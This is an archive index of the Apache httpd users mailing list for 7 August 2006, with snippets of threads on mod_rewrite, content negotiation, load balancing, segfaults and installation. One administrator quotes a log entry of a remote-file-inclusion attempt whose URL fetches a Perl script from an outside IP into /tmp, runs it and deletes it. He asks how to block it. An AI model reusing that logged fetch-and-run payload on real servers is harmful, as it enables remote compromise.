Re: [EMAIL PROTECTED] Please help

2006-08-07 Thread Joshua Slive
On 8/7/06, alexa song <[EMAIL PROTECTED]> wrote: Dear Owen, I have tried over and over again to get out of the newsgroup, sending emails to unsubscribe... But, next day or a week after and continuously... it goes on. I don't know but you seemed heavily involved with this group. And seem

[EMAIL PROTECTED] Please help

2006-08-07 Thread alexa song
Dear Owen, I have tried over and over again to get out of the newsgroup, sending emails to unsubscribe... But, next day or a week after and continuously... it goes on. I don't know but you seemed heavily involved with this group. And seems to me it is the last card for me to try sending emai

Re: [EMAIL PROTECTED] Question: Apache 1.3 and SetEnvIf /RedirectMatch

2006-08-07 Thread Joshua Slive
On 8/7/06, david <[EMAIL PROTECTED]> wrote: Hello! Recently, i've founded some entries on my apache webserver log like this: [IP] - - [05/Aug/2006:02:17:47 +0200] "GET /nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>

Re: [EMAIL PROTECTED] Content Negotiation - English zh-TW and Chinese zh-CN

2006-08-07 Thread Joshua Slive
On 8/7/06, Alex Sink <[EMAIL PROTECTED]> wrote: We have Simplified Chinese language pages that we wish to serve only to our mainland Chinese customers, and have all other variants of Chinese language (example: zh-TW or zh-sg) tags default to English. Or put differently, I want zh* language-tags

[EMAIL PROTECTED] Question: Apache 1.3 and SetEnvIf /RedirectMatch

2006-08-07 Thread david
Hello! Recently, i've founded some entries on my apache webserver log like this: [IP] - - [05/Aug/2006:02:17:47 +0200] "GET /nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*

RE: [EMAIL PROTECTED] Content Negotiation - English zh-TW and Chinese zh-CN

2006-08-07 Thread Alex Sink
We have Simplified Chinese language pages that we wish to serve only to our mainland Chinese customers, and have all other variants of Chinese language (example: zh-TW or zh-sg) tags default to English. Or put differently, I want zh* language-tags (from: http://www.iana.org/assignments/language-ta

Re: [EMAIL PROTECTED] Content Negotiation - English zh-TW and Chinese zh-CN

2006-08-07 Thread Joshua Slive
On 8/7/06, Alex Sink <[EMAIL PROTECTED]> wrote: Hi, Our website correctly handles several languages with content negotiation, but we wish to direct only our Chinese customers to our simplified Chinese pages, and have all other Chinese language-tags return English pages. Does anyone know how to

Re: [EMAIL PROTECTED] 2nd try: Load balancing Apache on both HTTP and HTTPS

2006-08-07 Thread Nes Yarug
On 8/7/06, Pid <[EMAIL PROTECTED]> wrote: Nes Yarug wrote:> Hi all,>> 2nd try to see if anyone can shed some light on my configuration.>> I've been trying to configure Apache's balancer proxy, but have not had any> luck. I've been trying to configure a load balancing proxy that forwards > requests

[EMAIL PROTECTED] Content Negotiation - English zh-TW and Chinese zh-CN

2006-08-07 Thread Alex Sink
Hi, Our website correctly handles several languages with content negotiation, but we wish to direct only our Chinese customers to our simplified Chinese pages, and have all other Chinese language-tags return English pages. Does anyone know how to make our Chinese pages only show up for zh-CN brow

Re: [EMAIL PROTECTED] mod_auth_mysql

2006-08-07 Thread paredes
Hi Michael! Set your apache loglevel directive to debug. Then you can open and monitor your apache error log live [sudo tail -f pathToYourErrorLog] as you hit your protected page with your browser. You should be able to see what mod_auth_mysql returns to the logs. I noticed that you are usin

Re: [EMAIL PROTECTED] Rewrite - Almost there !

2006-08-07 Thread SOPRO
Joshua, It works very fine ! :-) I'm so grateful ! Finally, my config is working: begin RewriteCond %{REQUEST_URI} ^/app/.* RewriteCond %{REQUEST_URI} !\. RewriteRule ^/(.*)/([^/]+)$ http://localhost:5050/app/index.jsp?id=$2 [P,L] RewriteRule ^/app/(.*) http://localhos

Re: [EMAIL PROTECTED] Rewrite - Almost there !

2006-08-07 Thread Joshua Slive
On 8/7/06, SOPRO <[EMAIL PROTECTED]> wrote: Joshua, Thanks so much ! I used the option "!\." and it works ... :-) However, the files 'stylesheet.css' and 'logo_client1.png' have not been loaded properly. Do you have any idea ? ps.: If I access JBOSS directly, the stylesheet and images are l

Re: [EMAIL PROTECTED] need help fighting DoS attack on Apache

2006-08-07 Thread Sergey Tsalkov
Stephanie, Y'know, it's weird that such a technically simple attack still has no commonly implemented defenses. I would venture to say that you can knock out the majority of webservers on the Internet today with a very small shell script that telnets to it a bunch of times on port 80 and leaves th

Re: [EMAIL PROTECTED] Rewrite - Almost there !

2006-08-07 Thread SOPRO
Joshua, Thanks so much ! I used the option "!\." and it works ... :-) However, the files 'stylesheet.css' and 'logo_client1.png' have not been loaded properly. Do you have any idea ? ps.: If I access JBOSS directly, the stylesheet and images are loaded fine. Thanks! Fabricio. 2006/8/7, Joshua

Re: [EMAIL PROTECTED] Rewrite - Almost there !

2006-08-07 Thread Joshua Slive
On 8/7/06, SOPRO <[EMAIL PROTECTED]> wrote: Hi friends, I'm trying to write a rule, that takes the client id and pass to an application hosted on a jboss server. ServerName server.mydomain.com RewriteEngine On RewriteLog "/var/log/apache/rewrite-ssl.log" RewriteLogLevel 3

Re: [EMAIL PROTECTED] two simple questions

2006-08-07 Thread Morgan Gangwere
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Monday 07 August 2006 12:10, Joshua Slive wrote: > On 8/7/06, Morgan Gangwere <[EMAIL PROTECTED]> wrote: > > -BEGIN PGP SIGNED MESSAGE- > > Hash: SHA1 > > > > On Sunday 06 August 2006 22:51, Joshua Slive wrote: > > > On 8/6/06, Ikke Snoeckx

[EMAIL PROTECTED] Rewrite - Almost there !

2006-08-07 Thread SOPRO
Hi friends, I'm trying to write a rule, that takes the client id and pass to an application hosted on a jboss server. ServerName server.mydomain.com RewriteEngine On RewriteLog "/var/log/apache/rewrite-ssl.log" RewriteLogLevel 3 RewriteCond %{REQUEST_URI} ^/app/.* RewriteRule

Re: [EMAIL PROTECTED] 2nd try: Load balancing Apache on both HTTP and HTTPS

2006-08-07 Thread Pid
Nes Yarug wrote: > Hi all, > > 2nd try to see if anyone can shed some light on my configuration. > > I've been trying to configure Apache's balancer proxy, but have not had any > luck. I've been trying to configure a load balancing proxy that forwards > requests to 2 web servers. I want both ht

Re: [EMAIL PROTECTED] Segfault & MaxClients problems [long]

2006-08-07 Thread Joshua Slive
On 8/7/06, Daniel A. Ramaley <[EMAIL PROTECTED]> wrote: Roughly half of the connections were from IPs that had less than 5 connections open (most had just 1). I would think those are normal users. The rest of the connections were taken up by half a dozen IPs with this number of connections open

Re: [EMAIL PROTECTED] Segfault & MaxClients problems [long]

2006-08-07 Thread Daniel A. Ramaley
On Monday 07 August 2006 11:05, Joshua Slive wrote: >That is clearly a programming error either in php or pcre. You might >want to try php forums or the php bug database to see if you can find >the solution. Thank you for taking the time to read my message and post a response. I'll check the PHP

Re: [EMAIL PROTECTED] two simple questions

2006-08-07 Thread Joshua Slive
On 8/7/06, Morgan Gangwere <[EMAIL PROTECTED]> wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Sunday 06 August 2006 22:51, Joshua Slive wrote: > On 8/6/06, Ikke Snoeckx <[EMAIL PROTECTED]> wrote: > > Hello > > > > I have two (simple) questions: > > > > 1. A RewriteRule: > > Basically, c

Re: [EMAIL PROTECTED] Several .htaccess

2006-08-07 Thread Marc MENDEZ
Hi, Great ! It works ! I didn't hope a so fast answer ! Thanks a lot ! - Original Message - From: "Joshua Slive" <[EMAIL PROTECTED]> To: Sent: Monday, August 07, 2006 5:42 PM Subject: Re: [EMAIL PROTECTED] Several .htaccess On 8/7/06, Marc MENDEZ <[EMAIL PROTECTED]> wrote: Hi,

[EMAIL PROTECTED] cross compiling

2006-08-07 Thread Yossy Dreyfus
Hello, I have tried to run. /configure for cross compiling. I gave the relevant compiler. The configure script gets the error that size of void* is less than "long". What can be the reason for this problem?

Re: [EMAIL PROTECTED] Segfault & MaxClients problems [long]

2006-08-07 Thread Joshua Slive
On 8/7/06, Daniel A. Ramaley <[EMAIL PROTECTED]> wrote: Symptom 1: After starting Apache during periods of high load the server appears to run fine for awhile ("awhile" is highly variable but on the order of 90 minutes) then starts returning empty pages. When the empty pages start, Apache's err

Re: [EMAIL PROTECTED] two simple questions

2006-08-07 Thread Morgan Gangwere
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Sunday 06 August 2006 22:51, Joshua Slive wrote: > On 8/6/06, Ikke Snoeckx <[EMAIL PROTECTED]> wrote: > > Hello > > > > I have two (simple) questions: > > > > 1. A RewriteRule: > > Basically, consider this: www.example.com/foo.bar ... Now, I want th

[EMAIL PROTECTED] Segfault & MaxClients problems [long]

2006-08-07 Thread Daniel A. Ramaley
Hello. I have been struggling for a few months to solve a problem with an Apache web server. First i'll try to describe the symptoms, then give details about the configuration and what i have tried so far. I would greatly appreciate any suggestions on how to diagnose and correct the problem(s).

Re: [EMAIL PROTECTED] Several .htaccess

2006-08-07 Thread Joshua Slive
On 8/7/06, Marc MENDEZ <[EMAIL PROTECTED]> wrote: Hi, The root of our extranet site is protected by a .htaccess file. If the user is inside our network, no identification is required. Otherwise, he must identified. Here is the file : AuthUserFile path_to_password_file AuthGroupFile /dev/null Au

[EMAIL PROTECTED] Several .htaccess

2006-08-07 Thread Marc MENDEZ
Hi, The root of our extranet site is protected by a .htaccess file. If the user is inside our network, no identification is required. Otherwise, he must identified. Here is the file : AuthUserFile path_to_password_file AuthGroupFile /dev/null AuthName ":: INFORMATIONS CONFIDENTIELLES ::" Auth

Re: [EMAIL PROTECTED] mod_rewrite rewriting URLs with an additional "/" at the end? (www->non www)

2006-08-07 Thread Evan Platt
At 07:30 AM 8/7/2006, you wrote: Hi, I'm trying to use mod_rewrite to redirect any "www.domain.com" -> "domain.com". I've set up the following rule: Do you mean if I go to www.domain.com/blahlbnlasd.html , it redirects to just domain.com , or if I go to www.domain.com it goes to domain.com

Re: [EMAIL PROTECTED] mod_rewrite rewriting URLs with an additional "/" at the end? (www->non www)

2006-08-07 Thread Neil A. Hillard
Hi, Rob Gabaree wrote: > I'm trying to use mod_rewrite to redirect any "www.domain.com" -> > "domain.com". I've set up the following rule: > > RewriteEngine On > RewriteCond %{HTTP_HOST} ^www\.domain\.com$ [NC] > RewriteRule ^(.*)$ http://domain.com/$1 [R=301,L] > > This works fine, but wheneve

[EMAIL PROTECTED] mod_rewrite rewriting URLs with an additional "/" at the end? (www->non www)

2006-08-07 Thread Rob Gabaree
Hi, I'm trying to use mod_rewrite to redirect any "www.domain.com" -> "domain.com". I've set up the following rule: RewriteEngine On RewriteCond %{HTTP_HOST} ^www\.domain\.com$ [NC] RewriteRule ^(.*)$ http://domain.com/$1 [R=301,L] This works fine, but whenever I try to go to "www.domain.com

Re: [EMAIL PROTECTED] server-status - what does this mean?

2006-08-07 Thread Marc Perkel
Eike Frost wrote: Hello, On Friday 04 August 2006 18:02, Marc Perkel wrote: I'm having connection problems. Running server status 90% of the connections look like this: *50-0* 17499 0/8/8 *R* 0.00 0 1 0.0 0.00 0.00 ? ? ..reading.. What does this mean? This

Re: [EMAIL PROTECTED] Unlock Your Mind's Hidden Power, Today...

2006-08-07 Thread Joshua Slive
Just ignore this, please. It is spam that came through a news-to-mail gateway. The owner of that gateway has blocked the sending domain. On 8/7/06, Declerck Michael-W30479 <[EMAIL PROTECTED]> wrote: Are you serious? -Original Message- From: news [mailto:[EMAIL PROTECTED] On Behalf Of

Re: [EMAIL PROTECTED] Finding out what apache was compiled with

2006-08-07 Thread Joshua Slive
On 8/7/06, patric <[EMAIL PROTECTED]> wrote: Hi guys I have decided to install mod_backhand for load balancing on a few servers, and need to compile apache with it in. This is the first time I will be doing this, and have read over the documentation, and am ready to go. What I would like to kn

Re: [EMAIL PROTECTED] APACHE Session ID issue.

2006-08-07 Thread Joshua Slive
On 8/7/06, Lalit Seth <[EMAIL PROTECTED]> wrote: Hi, APACHE - Server version: HP-UX_Apache-based_Web_Server/2.0.48 Server built: Nov 5 2003 03:42:46 Old version. Issue - Apache creates new session ID for each request for few of these DNS names. ie When i display session ID from PHP the

RE: [EMAIL PROTECTED] Unlock Your Mind's Hidden Power, Today...

2006-08-07 Thread Declerck Michael-W30479
Are you serious? -Original Message- From: news [mailto:[EMAIL PROTECTED] On Behalf Of John Sent: Sunday, August 06, 2006 8:36 AM To: users@httpd.apache.org Subject: [EMAIL PROTECTED] Unlock Your Mind's Hidden Power, Today... www.HumanDataTransfer.com great information. --- MAF Anti-Spa

RE: [EMAIL PROTECTED] Unable to use apachectl to start

2006-08-07 Thread Boyle Owen
> -Original Message- > From: Gordon Low [mailto:[EMAIL PROTECTED] > Sent: Monday, August 07, 2006 2:19 PM > To: users@httpd.apache.org > Subject: [EMAIL PROTECTED] Unable to use apachectl to start > > > > Hoping that I can get some help with what may be a straight > forward problem > t

[EMAIL PROTECTED] 2nd try: Load balancing Apache on both HTTP and HTTPS

2006-08-07 Thread Nes Yarug
Hi all,2nd try to see if anyone can shed some light on my configuration. I've been trying to configure Apache's balancer proxy, but have not had any luck. I've been trying to configure a load balancing proxy that forwards requests to 2 web servers. I want both http and https requests to be forwa

RE: [EMAIL PROTECTED] mod_auth_mysql

2006-08-07 Thread Michael Luff
Hello does anyone have any idea where I might look to resolve this issue? Many thanks. I'm using apache v2.0.55 and mod_auth_mysql v3 on a Gentoo Linux box. Below is a section from my httpd.conf - does it look right? # These modules provide authentication and authorisation for # clients.

[EMAIL PROTECTED] running as service and access network resource

2006-08-07 Thread Chen, Charles
Hi, Apache Gurus,     We tried to run the apache as a service on window 2003 server and the doc root is a shared network drive. We read the doc and know that localSystem user account can not be used for this configuration so we created a new user, and configured the user as instructed in

Re: [EMAIL PROTECTED] SetOutputFilter doesn't work in s?

2006-08-07 Thread Andy Buckley
Andy Buckley wrote: Andy Buckley wrote: Axel-Stéphane SMORGRAV wrote: SetOutputFilter works very well, even in Location filters. There are lots of happy customers of this feature, using it for such things as for example compression of response bodies. I tried with a configuration similar t

[EMAIL PROTECTED] Unable to use apachectl to start

2006-08-07 Thread Gordon Low
Hoping that I can get some help with what may be a straight forward problem to some of you. Have a fairly simple home setup on a PC running Debian Sarge with a Linux 2.4 kernel and noticed I couldn't access the website at the home directory /home/~ Went to recompile Apache with --suexec-userdir

[EMAIL PROTECTED] Finding out what apache was compiled with

2006-08-07 Thread patric
Hi guys I have decided to install mod_backhand for load balancing on a few servers, and need to compile apache with it in. This is the first time I will be doing this, and have read over the documentation, and am ready to go. What I would like to know is how to find out what apache was compiled

Re: [EMAIL PROTECTED] quite tricky, I need some serious help here.

2006-08-07 Thread Laurent Blume
Lech Karol Pawłaszek a écrit : > On Friday 04 August 2006 15:36, Vagelis Papadogiannakis wrote: > [...] >> Many many thanks to Laurent Blume. >> He is absolutelly my hero. > [...] > > Buy him a beer and praise his name forever. ;-) > > Kind regards, > That'll be a Corona for me please! ;-) Jus

Re: [EMAIL PROTECTED] apache amout to 100% cpu

2006-08-07 Thread William A. Rowe, Jr.
HAMMER_SHI wrote: > The enviroment as follow: > OS: Windows2003 > Apache 2.0 > > Today , I logon in the windows remotely, I found CPU amount to 100%. > > Anyone could tell me how to slove? No. But we can tell you how to get enough information to have a clue about what happened (fyi you better

Re: [EMAIL PROTECTED] apache install

2006-08-07 Thread Nick Kew
On Monday 07 August 2006 08:22, Maria Elena Sanchez wrote: > Hello, I have a problem and I need help. I'm working with solaris 9 and > I want install apache 2.2.2, but I have a fatal error running make: What make is that? If it's something crippled, it might be worth trying with GNU make. > ./co

[EMAIL PROTECTED] apache amout to 100% cpu

2006-08-07 Thread HAMMER_SHI
hi,all   I hava some problems with my server. The enviroment as follow:   OS: Windows2003 Apache 2.0 Php4.0 Zend Optimizer(TM), version 3.0   Today , I logon in the windows remotely, I found CPU amount to 100%.Once I stop the apache server and the CPU work well.From the attachment, you can see t

[EMAIL PROTECTED] apache install

2006-08-07 Thread Maria Elena Sanchez
Hello, I have a problem and I need help. I'm working with solaris 9 and I want install apache 2.2.2, but I have a fatal error running make: I ran configured using the following options ./configure --prefix=/opt/install/psbatlatam/apache2.2.3.frontend --enable-headers --enable-so --enable-rewri

[EMAIL PROTECTED] [Fwd: apache install]

2006-08-07 Thread Maria Elena Sanchez
--- Begin Message --- Hello, I have a problem and I need help. I'm working with solaris 9 and I want install apache 2.2.2, but I have a fatal error running make: I ran configured using the following options ./configure --prefix=/opt/install/psbatlatam/apache2.2.3.frontend --enable-headers --